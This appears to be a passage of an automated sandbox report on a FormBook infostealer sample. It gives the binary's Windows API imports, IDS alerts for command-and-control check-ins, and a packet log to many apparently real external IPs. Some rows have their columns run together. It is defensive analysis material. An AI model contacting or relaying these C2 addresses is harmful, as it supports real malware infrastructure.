USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T08:19:57.934086+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49775 | 13.248.221.243 | 80 | TCP
2024-11-24T08:20:15.190738+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49813 | 38.54.112.227 | 80 | TCP
2024-11-24T08:20:17.925091+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49819 | 38.54.112.227 | 80 | TCP
2024-11-24T08:20:20.628223+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49828 | 38.54.112.227 | 80 | TCP
2024-11-24T08:20:23.425972+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49836 | 38.54.112.227 | 80 | TCP
2024-11-24T08:20:31.034448+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49852 | 47.76.213.197 | 80 | TCP
2024-11-24T08:20:33.690775+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49858 | 47.76.213.197 | 80 | TCP
2024-11-24T08:20:36.362609+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49868 | 47.76.213.197 | 80 | TCP
2024-11-24T08:20:39.097696+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49875 | 47.76.213.197 | 80 | TCP
2024-11-24T08:20:46.351229+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49891 | 74.48.143.82 | 80 | TCP
2024-11-24T08:20:48.960155+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49897 | 74.48.143.82 | 80 | TCP
2024-11-24T08:20:51.617592+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49905 | 74.48.143.82 | 80 | TCP
2024-11-24T08:20:54.303139+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49912 | 74.48.143.82 | 80 | TCP
2024-11-24T08:21:00.864255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49927 | 13.248.169.48 | 80 | TCP
2024-11-24T08:21:03.597769+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49935 | 13.248.169.48 | 80 | TCP
2024-11-24T08:21:06.167057+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49942 | 13.248.169.48 | 80 | TCP
2024-11-24T08:21:08.930320+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49948 | 13.248.169.48 | 80 | TCP
2024-11-24T08:21:16.566182+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49965 | 103.21.221.87 | 80 | TCP
2024-11-24T08:21:19.270132+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49972 | 103.21.221.87 | 80 | TCP
2024-11-24T08:21:21.941010+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49980 | 103.21.221.87 | 80 | TCP
2024-11-24T08:21:24.655094+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49987 | 103.21.221.87 | 80 | TCP
2024-11-24T08:21:32.910270+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 8.210.46.21 | 80 | TCP
2024-11-24T08:21:35.644148+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 8.210.46.21 | 80 | TCP
2024-11-24T08:21:38.302174+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 8.210.46.21 | 80 | TCP
2024-11-24T08:21:41.021032+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50000 | 8.210.46.21 | 80 | TCP
2024-11-24T08:21:47.613670+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 203.161.43.228 | 80 | TCP
2024-11-24T08:21:50.386226+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 203.161.43.228 | 80 | TCP
2024-11-24T08:21:53.080355+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 203.161.43.228 | 80 | TCP
2024-11-24T08:21:55.677808+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50004 | 203.161.43.228 | 80 | TCP
2024-11-24T08:22:02.229431+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 13.248.169.48 | 80 | TCP
2024-11-24T08:22:04.920227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 13.248.169.48 | 80 | TCP
2024-11-24T08:22:07.541345+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 13.248.169.48 | 80 | TCP
2024-11-24T08:22:10.256688+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50008 | 13.248.169.48 | 80 | TCP
2024-11-24T08:22:17.018327+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 147.255.21.187 | 80 | TCP
2024-11-24T08:22:19.677568+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 147.255.21.187 | 80 | TCP
2024-11-24T08:22:22.390336+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 147.255.21.187 | 80 | TCP
2024-11-24T08:22:25.056018+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50012 | 147.255.21.187 | 80 | TCP
2024-11-24T08:22:31.633087+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 172.67.159.61 | 80 | TCP
2024-11-24T08:22:34.380153+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 172.67.159.61 | 80 | TCP
2024-11-24T08:22:37.059844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 172.67.159.61 | 80 | TCP
2024-11-24T08:22:39.735023+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50016 | 172.67.159.61 | 80 | TCP
                                                                                          2024-11-24T08:22:46.817185+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017172.67.168.22880TCP
                                                                                          2024-11-24T08:22:49.487701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018172.67.168.22880TCP
                                                                                          2024-11-24T08:22:52.143905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019172.67.168.22880TCP
                                                                                          2024-11-24T08:22:54.926351+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550020172.67.168.22880TCP
                                                                                          2024-11-24T08:23:01.802045+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021194.58.112.17480TCP
                                                                                          2024-11-24T08:23:04.440140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022194.58.112.17480TCP
                                                                                          2024-11-24T08:23:07.116769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023194.58.112.17480TCP
                                                                                          2024-11-24T08:23:09.783841+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550024194.58.112.17480TCP
                                                                                          2024-11-24T08:23:16.435572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550025172.67.220.3680TCP
                                                                                          2024-11-24T08:23:19.516006+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550026172.67.220.3680TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                          Nov 24, 2024 08:21:16.685709000 CET8049965103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:16.685873985 CET4996580192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:17.586247921 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:17.705790997 CET8049972103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:17.705893040 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:17.723059893 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:17.842967987 CET8049972103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:19.270132065 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:19.323393106 CET8049972103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:19.323488951 CET8049972103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:19.323575020 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:19.323575020 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:19.389632940 CET8049972103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:19.389703035 CET4997280192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:20.287641048 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:20.407747030 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:20.410350084 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:20.425128937 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:20.544754982 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:20.544760942 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:21.941009998 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:22.021486044 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:22.021660089 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:22.021687984 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:22.021809101 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:22.060731888 CET8049980103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:22.060884953 CET4998080192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:22.959459066 CET4998780192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:23.079081059 CET8049987103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:23.079335928 CET4998780192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:23.090171099 CET4998780192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:23.209749937 CET8049987103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:24.654767036 CET8049987103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:24.654864073 CET8049987103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:24.655093908 CET4998780192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:24.657932043 CET4998780192.168.2.5103.21.221.87
                                                                                          Nov 24, 2024 08:21:24.777394056 CET8049987103.21.221.87192.168.2.5
                                                                                          Nov 24, 2024 08:21:31.266022921 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:31.385560036 CET80499978.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:31.385646105 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:31.404820919 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:31.524485111 CET80499978.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:32.910269976 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:33.009054899 CET80499978.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:33.009152889 CET80499978.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:33.009253979 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:33.009253979 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:33.029732943 CET80499978.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:33.029840946 CET4999780192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:33.929653883 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:34.114283085 CET80499988.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:34.114526033 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:34.129774094 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:34.353554964 CET80499988.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:35.644148111 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:35.649779081 CET80499988.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:35.649847984 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:35.649867058 CET80499988.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:35.649934053 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:35.763667107 CET80499988.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:35.764964104 CET4999880192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:36.662467957 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:36.781904936 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:36.782015085 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:36.798192978 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:36.917927980 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:36.917934895 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:38.302174091 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:38.359129906 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:38.359155893 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:38.362293959 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:38.362293959 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:38.422064066 CET80499998.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:38.428287983 CET4999980192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:39.320506096 CET5000080192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:39.440035105 CET80500008.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:39.440182924 CET5000080192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:39.451864004 CET5000080192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:39.571439981 CET80500008.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:41.020780087 CET80500008.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:41.020797968 CET80500008.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:41.021032095 CET5000080192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:41.024080992 CET5000080192.168.2.58.210.46.21
                                                                                          Nov 24, 2024 08:21:41.143631935 CET80500008.210.46.21192.168.2.5
                                                                                          Nov 24, 2024 08:21:46.259846926 CET5000180192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:46.379492998 CET8050001203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:46.383357048 CET5000180192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:46.395579100 CET5000180192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:46.515260935 CET8050001203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:47.613506079 CET8050001203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:47.613612890 CET8050001203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:47.613670111 CET5000180192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:47.909512043 CET5000180192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:48.930208921 CET5000280192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:49.049849987 CET8050002203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:49.050445080 CET5000280192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:49.065767050 CET5000280192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:49.186166048 CET8050002203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:50.380141020 CET8050002203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:50.380213022 CET8050002203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:50.386225939 CET5000280192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:50.582320929 CET5000280192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:51.605134964 CET5000380192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:51.724625111 CET8050003203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:51.724719048 CET5000380192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:51.743454933 CET5000380192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:51.862982988 CET8050003203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:51.863127947 CET8050003203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:53.076112986 CET8050003203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:53.076333046 CET8050003203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:53.080354929 CET5000380192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:53.253232956 CET5000380192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:54.272926092 CET5000480192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:54.392991066 CET8050004203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:54.400548935 CET5000480192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:54.410326958 CET5000480192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:54.529885054 CET8050004203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:55.677627087 CET8050004203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:55.677697897 CET8050004203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:21:55.677808046 CET5000480192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:55.681221008 CET5000480192.168.2.5203.161.43.228
                                                                                          Nov 24, 2024 08:21:55.800625086 CET8050004203.161.43.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:00.917731047 CET5000580192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:01.037384033 CET805000513.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:01.037509918 CET5000580192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:01.052650928 CET5000580192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:01.172203064 CET805000513.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:02.229317904 CET805000513.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:02.229430914 CET5000580192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:02.565726042 CET5000580192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:02.685244083 CET805000513.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:03.607141972 CET5000680192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:03.726727009 CET805000613.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:03.726820946 CET5000680192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:03.747143030 CET5000680192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:03.866844893 CET805000613.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:04.919627905 CET805000613.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:04.920227051 CET5000680192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:05.253371000 CET5000680192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:05.372807980 CET805000613.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:06.272516012 CET5000780192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:06.392074108 CET805000713.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:06.394340038 CET5000780192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:06.409101963 CET5000780192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:06.528784037 CET805000713.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:06.528862953 CET805000713.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:07.541281939 CET805000713.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:07.541344881 CET5000780192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:07.925657034 CET5000780192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:08.045213938 CET805000713.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:08.944319963 CET5000880192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:09.064095020 CET805000813.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:09.064459085 CET5000880192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:09.076402903 CET5000880192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:09.195861101 CET805000813.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:10.256428003 CET805000813.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:10.256537914 CET805000813.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:10.256688118 CET5000880192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:10.259547949 CET5000880192.168.2.513.248.169.48
                                                                                          Nov 24, 2024 08:22:10.379009008 CET805000813.248.169.48192.168.2.5
                                                                                          Nov 24, 2024 08:22:15.665267944 CET5000980192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:15.784847975 CET8050009147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:15.784928083 CET5000980192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:15.804099083 CET5000980192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:15.923716068 CET8050009147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:17.015028000 CET8050009147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:17.015079975 CET8050009147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:17.018326998 CET5000980192.168.2.5147.255.21.187
